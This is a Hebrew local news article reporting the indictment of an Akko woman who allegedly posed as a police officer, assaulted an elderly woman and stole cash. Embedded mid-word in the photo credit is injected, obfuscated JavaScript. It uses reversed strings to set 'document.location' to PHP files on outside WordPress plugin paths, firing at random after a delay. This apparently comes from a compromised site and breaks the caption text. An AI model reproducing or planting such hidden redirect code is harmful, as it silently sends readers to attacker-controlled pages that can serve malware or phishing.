fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

תושבת עכו התחזתה לשוטרת ושדדה קשישה באיומים שתהרוג אותה

חטיבת התביעות של משטרת ישראל הגישה הבוקר כתב אישום נגד תושבת עכו בחשד שתקפה קשישה תושבת העיר וגנבה ממנה כסף מזומן תוך כדי התחזות לשוטרת ואיומים כי תחנוק אותה עד מוות. החשודה עצורה עד תום ההליכים.
השודדת נעצרה | צילום: shutterstock
השודדת נעצרה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

המשטרה פתחה בחקירה עם קבלת דיווח במוקד 100 לפני כשבועיים בדבר חשד לתקיפה של קשישה תושבת עכו וגניבת כסף מזומן מביתה.

מהחקירה עולה כי החשודה, תושבת עכו, הגיעה לביתה של הקשישה נקשה בדלת הבית והזדהתה כשוטרת כאשר איימה על הקורבן כי אם לא תפתח את דלת הבית היא תשבור את הדלת ותהרוג אותה.

הקשישה שחששה לחייה פתחה את דלת הבית והחשודה תקפה אותה באופן שהניחה בחוזקה את ידיה על פיה של הקשישה כך שלא יכולה הייתה לנשום תוך שהיא צועקת לעברה כי היא "רוצה לחנוק אותה עד שתמות".

בהמשך החשודה לקחה מביתה של הקשישה מאות שקלים במזומן ועזבה את המקום כשהכסף ברשותה.

בתום חקירה מאומצת שכללה גביית עדויות ואיסוף ראיות מהזירה חשפו שוטרי תחנת עכו את זהותה של החשודה, תושבת עכו כבת 34 ועצרו אותה לפני מס' ימים לחקירה בתחנת המשטרה.

מעצרה של החשודה הוארך מעת לעת והבוקר, כאמור, חטיבת התביעות של משטרת ישראל הגישה נגד החשודה כתב אישום ובקשה למעצרה עד תום ההליכים לבית משפט השלום בעכו.

 

 

 

הישארו מעודכנים בחדשות נהריה וצפון 1 ובפייסבוק שלנו!

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות